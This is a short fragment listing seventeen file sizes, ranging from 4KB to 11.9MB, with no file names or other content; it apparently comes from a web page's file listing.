Filesize
84KB
-
Filesize
84KB
-
Filesize
124KB
-
Filesize
232KB
-
Filesize
160KB
-
Filesize
4KB
-
Filesize
160KB
-
Filesize
72KB
-
Filesize
140KB
-
Filesize
140KB
-
Filesize
256KB
-
Filesize
68KB
-
Filesize
68KB
-
Filesize
11.9MB
-
Filesize
11.9MB
-
Filesize
9.5MB
-
Filesize
9.5MB